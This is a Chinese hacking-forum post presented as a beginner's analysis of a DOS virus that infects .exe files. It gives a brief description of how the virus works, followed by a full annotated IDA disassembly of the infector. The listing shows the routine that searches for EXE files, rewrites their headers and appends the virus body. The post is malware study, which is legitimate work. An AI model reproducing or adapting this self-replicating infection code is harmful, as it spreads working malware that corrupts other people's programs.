跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

菜鸟的病毒分析2

CHQ1d
CHQ1d
木马病毒分析

精选回复

发布于
dos 运行期.exe文件感染病毒 还是如此的菜原谅我吧
病毒行为:感染.com文件 修改被感染文件的SS:SP
流程:恢复被感染的文件的 cs:ip ss:sp 搜索.exe 如果是正确的.exe文件并且没有被感染过 ,打开文件保存文件信息 ,进行感染修改测试:ip ss:sp, 添加病毒代码 ,恢复文件信息 ,关闭文件
用到的中断与上篇.com文件的感染相同
dos下com文件与exe文件最大的不同就是头,com文件只有程序映像是从100h起的绝对映像。exe文件包括一个可重新定位的程序映像,还包含一个文件头用来重定位。文件头包括cs ss ip sp 文件头大小等敏感信息就是将要利用到的。
反汇编结果:
seg000:0000 ;
seg000:0000 ; +-------------------------------------------------------------------------+
seg000:0000 ; | This file is generated by The Interactive Disassembler (IDA) |
seg000:0000 ; | Copyright (c) 2007 by DataRescue sa/nv, <[email protected]> |
seg000:0000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
seg000:0000 ; +-------------------------------------------------------------------------+
seg000:0000 ;
seg000:0000 ; Input MD5 : 65A4A3AB8F1AC63E12E1FC451B83316A
seg000:0000
seg000:0000 ; File Name : C:\新建文件夹\virus_exe.exe
seg000:0000 ; Format : MS-DOS executable (EXE)
seg000:0000 ; Base Address: 0h Range: 0h-31Ch Loaded length: 31Ch
seg000:0000 ; Entry Point : 0:100
seg000:0000
seg000:0000 .386
seg000:0000 .model large
seg000:0000
seg000:0000 ; ===========================================================================
seg000:0000
seg000:0000 ; Segment type: Pure code
seg000:0000 seg000 segment byte public 'CODE' use16
seg000:0000 assume cs:seg000
seg000:0000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:0000 byte_0 db 100h dup(0) ; CODE XREF: start:loc_173J
seg000:0100 assume ss:seg000, ds:nothing
seg000:0100
seg000:0100 ; =============== S U B R O U T I N E =======================================
seg000:0100
seg000:0100
seg000:0100 public start
seg000:0100 start proc near
seg000:0100 call $+3
seg000:0103 pop bp
seg000:0104 sub bp, 103h ; 相对偏移
seg000:0108 push ds
seg000:0109 push es
seg000:010A push cs
seg000:010B pop es
seg000:010C assume es:seg000
seg000:010C push cs
seg000:010D pop ds
seg000:010E assume ds:seg000
seg000:010E mov ah, 1Ah
seg000:0110 lea dx, [bp+295h] ; newdta DTA地址
seg000:0114 int 21h ; DOS - SET DISK TRANSFER AREA ADDRESS
seg000:0114 ; DS:DX -> disk transfer buffer
seg000:0116 mov ah, 47h ; 'G'
seg000:0118 lea si, [bp+2C0h]
seg000:011C cwd
seg000:011D int 21h ; DOS - 2+ - GET CURRENT DIRECTORY
seg000:011D ; DL = drive (0=default, 1=A, etc.)
seg000:011D ; DS:SI points to 64-byte buffer area
seg000:011F lea di, [bp+174h]
seg000:0123 lea si, [bp+17Ch]
seg000:0127 movsw
seg000:0128 movsw
seg000:0129 movsw
seg000:012A movsw
seg000:012B mov byte ptr [bp+301h], 0 ; 可能用作计数
seg000:0130
seg000:0130 loc_130: ; CODE XREF: start+46j
seg000:0130 lea dx, [bp+286h]
seg000:0134 call sub_185
seg000:0137 cmp byte ptr [bp+301h], 3
seg000:013C jnb short loc_148
seg000:013E mov ah, 3Bh ; ';' ;获取当前的路径
seg000:0140 lea dx, [bp+28Ch]
seg000:0144 int 21h ; DOS - 2+ - CHANGE THE CURRENT DIRECTORY (CHDIR)
seg000:0144 ; DS:DX -> ASCIZ directory name (may include drive)
seg000:0146 jnb short loc_130
seg000:0148
seg000:0148 loc_148: ; CODE XREF: start+3Cj
seg000:0148 lea si, [bp+2C0h]
seg000:014C mov ah, 3Bh ; ';' ;转换当权的路径
seg000:014E xchg dx, si
seg000:0150 int 21h ; DOS - 2+ - CHANGE THE CURRENT DIRECTORY (CHDIR)
seg000:0150 ; DS:DX -> ASCIZ directory name (may include drive)
seg000:0152 pop es
seg000:0153 assume es:nothing
seg000:0153 pop ds
seg000:0154 assume ds:nothing
seg000:0154 mov dx, 80h ; '€' 恢复初始DTA
seg000:0157 mov ah, 1Ah
seg000:0159 int 21h ; DOS - SET DISK TRANSFER AREA ADDRESS
seg000:0159 ; DS:DX -> disk transfer buffer
seg000:015B mov ax, ds ;恢复目标文件 ss:sp
seg000:015D add ax, 10h
seg000:0160 add cs:[bp+176h], ax
seg000:0165 add ax, cs:[bp+178h]
seg000:016A cli
seg000:016B mov ss, ax
seg000:016D assume ss:nothing
seg000:016D mov sp, cs:[bp+17Ah]
seg000:0172 sti
seg000:0173
seg000:0173 loc_173:
seg000:0173 jmp far ptr byte_0
seg000:0173 start endp
seg000:0173
seg000:0173 ; ---------------------------------------------------------------------------
seg000:0178 word_178 dw 0
seg000:017A db 0
seg000:017B db 0
seg000:017C db 0
seg000:017D db 0
seg000:017E db 0F0h ; ?
seg000:017F db 0FFh
seg000:0180 db 0
seg000:0181 db 0
seg000:0182 db 0
seg000:0183 db 0
seg000:0184 ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
seg000:0185
seg000:0185 ; =============== S U B R O U T I N E =======================================
seg000:0185
seg000:0185
seg000:0185 sub_185 proc near ; CODE XREF: start+34p
seg000:0185 mov cx, 7
seg000:0188 mov ah, 4Eh
seg000:018A
seg000:018A loc_18A: ; CODE XREF: sub_185+F6j
seg000:018A int 21h ; DOS - 2+ - FIND FIRST ASCIZ (FINDFIRST)
seg000:018A ; CX = search attributes
seg000:018A ; DS:DX -> ASCIZ filespec
seg000:018A ; (drive, path, and wildcards allowed)
seg000:018C jb short nullsub_1 ; 没找到exe文件
seg000:018E lea dx, [bp+2B3h]
seg000:0192 mov ax, 4300h
seg000:0195 int 21h ; DOS - 2+ - GET FILE ATTRIBUTES
seg000:0195 ; DS:DX -> ASCIZ file name or directory
seg000:0195 ; name without trailing slash
seg000:0197 jb short nullsub_1
seg000:0199 push cx ; 保存 当前文件属性
seg000:019A push dx
seg000:019B mov ax, 4301h
seg000:019E push ax
seg000:019F xor cx, cx
seg000:01A1 int 21h ; DOS - 2+ - SET FILE ATTRIBUTES
seg000:01A1 ; DS:DX -> ASCIZ file name
seg000:01A1 ; CX = file attribute bits
seg000:01A3 mov ax, 3D02h
seg000:01A6 lea dx, [bp+2B3h]
seg000:01AA int 21h ; DOS - 2+ - OPEN DISK FILE WITH HANDLE
seg000:01AA ; DS:DX -> ASCIZ filename
seg000:01AA ; AL = access mode
seg000:01AA ; 2 - read & write
seg000:01AC xchg ax, bx ; bx=文件句柄
seg000:01AD mov ax, 5700h
seg000:01B0 int 21h ; DOS - 2+ - GET FILE'S DATE/TIME
seg000:01B0 ; BX = file handle
seg000:01B2 push cx
seg000:01B3 push dx
seg000:01B4 mov ah, 3Fh ; '?'
seg000:01B6 mov cx, 1Ah
seg000:01B9 lea dx, [bp+302h]
seg000:01BD int 21h ; DOS - 2+ - READ FROM FILE WITH HANDLE
seg000:01BD ; BX = file handle, CX = number of bytes to read
seg000:01BD ; DS:DX -> buffer
seg000:01BF mov ax, 4202h
seg000:01C2 xor cx, cx
seg000:01C4 cwd
seg000:01C5 int 21h ; DOS - 2+ - MOVE FILE READ/WRITE POINTER (LSEEK)
seg000:01C5 ; AL = method: offset from end of file
seg000:01C7 cmp word ptr [bp+302h], 'ZM'
seg000:01CD cmp word ptr [bp+302h], 'MZ'
seg000:01D3 jnz short loc_1DD
seg000:01D5 cmp word ptr [bp+312h], 'id'
seg000:01DB jnz short loc_1E0 ; 保存目标文件的信息
seg000:01DD
seg000:01DD loc_1DD: ; CODE XREF: sub_185+4Ej
seg000:01DD jmp loc_269
seg000:01E0 ; ---------------------------------------------------------------------------
seg000:01E0
seg000:01E0 loc_1E0: ; CODE XREF: sub_185+56j
seg000:01E0 lea si, [bp+316h] ; 保存目标文件的信息
seg000:01E4 lea di, [bp+17Ch]
seg000:01E8 movsw
seg000:01E9 movsw
seg000:01EA sub si, 0Ah
seg000:01ED movsw
seg000:01EE movsw
seg000:01EF push bx
seg000:01F0 mov bx, [bp+30Ah]
seg000:01F4 mov cl, 4
seg000:01F6 shl bx, cl
seg000:01F8 push dx
seg000:01F9 push ax
seg000:01FA sub ax, bx
seg000:01FC sbb dx, 0
seg000:01FF mov cx, 10h
seg000:0202 div cx
seg000:0204 mov [bp+310h], ax ; 重新设置目标文件的ds ss ip sp这就是 头起到的重要作用
seg000:0208 mov [bp+316h], dx
seg000:020C mov word ptr [bp+312h], 'id'
seg000:0212 mov [bp+318h], ax ; 病毒的行文将sp设置为id
seg000:0216 pop ax
seg000:0217 pop dx
seg000:0218 add ax, 18Fh
seg000:021B adc dx, 0
seg000:021E pop ax
seg000:021F pop dx
seg000:0220 add ax, 18Fh
seg000:0223 adc dx, 0
seg000:0226 mov cl, 9
seg000:0228 push ax
seg000:0229 shr ax, cl
seg000:022B ror dx, cl
seg000:022D stc
seg000:022E adc dx, ax
seg000:0230 pop ax
seg000:0231 and ah, 1
seg000:0234 mov [bp+304h], ax
seg000:0238 mov [bp+306h], dx
seg000:023C pop bx
seg000:023D mov cx, 18Fh
seg000:0240 lea dx, [bp+100h] ; 重写文件头,使程序开始时跳转到自己的病毒程序开始
seg000:0244 mov ah, 40h
seg000:0246 int 21h ; DOS - 2+ - WRITE TO FILE WITH HANDLE
seg000:0246 ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
seg000:0248 mov ax, 9
seg000:024B mov dx, [bp+28Fh]
seg000:024F int 21h ; DOS - PROGRAM TERMINATION
seg000:0251 ; ---------------------------------------------------------------------------
seg000:0251 xor dx, dx
seg000:0253 mov ax, 4200h ; 恢复文件信息
seg000:0256 xor cx, cx
seg000:0258 int 21h ; DOS - 2+ - MOVE FILE READ/WRITE POINTER (LSEEK)
seg000:0258 ; AL = method: offset from beginning of file
seg000:025A lea dx, [bp+302h]
seg000:025E mov cx, 1Ah
seg000:0261 mov ah, 40h
seg000:0263 int 21h ; DOS - 2+ - WRITE TO FILE WITH HANDLE
seg000:0263 ; BX = file handle, CX = number of bytes to write, DS:DX -> buffer
seg000:0265 inc byte ptr [bp+301h]
seg000:0269
seg000:0269 loc_269: ; CODE XREF: sub_185:loc_1DDj
seg000:0269 mov ax, 5701h
seg000:026C pop dx
seg000:026D pop cx
seg000:026E int 21h ; DOS - 2+ - SET FILE'S DATE/TIME
seg000:026E ; BX = file handle, CX = time to be set
seg000:026E ; DX = date to be set
seg000:0270 mov ah, 3Eh
seg000:0272 int 21h ; DOS - 2+ - CLOSE A FILE WITH HANDLE
seg000:0272 ; BX = file handle
seg000:0274 pop ax
seg000:0275 pop dx
seg000:0276 pop cx
seg000:0277 int 21h ; DOS -
seg000:0279 mov ah, 4Fh ; 'O'
seg000:027B jmp loc_18A
seg000:027B sub_185 endp ; sp-analysis failed
seg000:027B
seg000:027B ; ---------------------------------------------------------------------------
seg000:027E word_27E dw 505Bh
seg000:0280 db 53h ; S
seg000:0281 db 2Fh ; /
seg000:0282 db 47h ; G
seg000:0283 db 0FDh ; ?
seg000:0284 db 5Dh ; ]
seg000:0285 db 0
seg000:0286 db 2Ah ; *
seg000:0287 db 2Eh ; .
seg000:0288 db 45h ; E
seg000:0289 db 58h ; X
seg000:028A db 45h ; E
seg000:028B db 0
seg000:028C db 2Eh ; .
seg000:028D db 2Eh ; .
seg000:028E db 0
seg000:028F db 69h ; i
seg000:0290 db 6Eh ; n
seg000:0291 db 66h ; f
seg000:0292 db 65h ; e
seg000:0293 db 63h ; c
seg000:0294 db 74h ; t
seg000:0295 new_Dta db 0
seg000:0296 db 0
seg000:0297 db 0
seg000:0298 db 0
seg000:0299 db 0
seg000:029A db 0
seg000:029B db 0
seg000:029C db 0
seg000:029D db 0
seg000:029E db 0
seg000:029F db 0
seg000:02A0 db 0
seg000:02A1 db 0
seg000:02A2 db 0
seg000:02A3 db 0
seg000:02A4 db 0
seg000:02A5 db 0
seg000:02A6 db 0
seg000:02A7 db 0
seg000:02A8 db 0
seg000:02A9 db 0
seg000:02AA db 0
seg000:02AB db 0
seg000:02AC db 0
seg000:02AD db 0
seg000:02AE db 0
seg000:02AF db 0
seg000:02B0 db 0
seg000:02B1 db 0
seg000:02B2 db 0
seg000:02B3 current_filename db 0
seg000:02B4 db 0
seg000:02B5 db 0
seg000:02B6 db 0
seg000:02B7 db 0
seg000:02B8 db 0
seg000:02B9 db 0
seg000:02BA db 0
seg000:02BB db 0
seg000:02BC db 0
seg000:02BD db 0
seg000:02BE db 0
seg000:02BF db 0
seg000:02C0 current_dir db 0
seg000:02C1 db 0
seg000:02C2 db 0
seg000:02C3 db 0
seg000:02C4 db 0
seg000:02C5 db 0
seg000:02C6 db 0
seg000:02C7 db 0
seg000:02C8 db 0
seg000:02C9 db 0
seg000:02CA db 0
seg000:02CB db 0
seg000:02CC db 0
seg000:02CD db 0
seg000:02CE db 0
seg000:02CF db 0
seg000:02D0 db 0
seg000:02D1 db 0
seg000:02D2 db 0
seg000:02D3 db 0
seg000:02D4 db 0
seg000:02D5 db 0
seg000:02D6 db 0
seg000:02D7 db 0
seg000:02D8 db 0
seg000:02D9 db 0
seg000:02DA db 0
seg000:02DB db 0
seg000:02DC db 0
seg000:02DD db 0
seg000:02DE db 0
seg000:02DF db 0
seg000:02E0 db 0
seg000:02E1 db 0
seg000:02E2 db 0
seg000:02E3 db 0
seg000:02E4 db 0
seg000:02E5 db 0
seg000:02E6 db 0
seg000:02E7 db 0
seg000:02E8 db 0
seg000:02E9 db 0
seg000:02EA db 0
seg000:02EB db 0
seg000:02EC db 0
seg000:02ED db 0
seg000:02EE db 0
seg000:02EF db 0
seg000:02F0 db 0
seg000:02F1 db 0
seg000:02F2 db 0
seg000:02F3 db 0
seg000:02F4 db 0
seg000:02F5 db 0
seg000:02F6 db 0
seg000:02F7 db 0
seg000:02F8 db 0
seg000:02F9 db 0
seg000:02FA db 0
seg000:02FB db 0
seg000:02FC db 0
seg000:02FD db 0
seg000:02FE db 0
seg000:02FF db 0
seg000:0300 db 0
seg000:0301 unk_301 db 0
seg000:0302 first26byte db 0
seg000:0303 db 0
seg000:0304 db 0
seg000:0305 db 0
seg000:0306 db 0
seg000:0307 db 0
seg000:0308 db 0
seg000:0309 db 0
seg000:030A db 0
seg000:030B db 0
seg000:030C db 0
seg000:030D db 0
seg000:030E db 0
seg000:030F db 0
seg000:0310 db 0
seg000:0311 db 0
seg000:0312 unk_312 db 0
seg000:0313 db 0
seg000:0314 db 0
seg000:0315 db 0
seg000:0316 db 0
seg000:0317 db 0
seg000:0318 db 0
seg000:0319 db 0
seg000:031A db 0
seg000:031B db 0
seg000:031B seg000 ends
seg000:031B
seg000:031B
seg000:031B end start

 

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。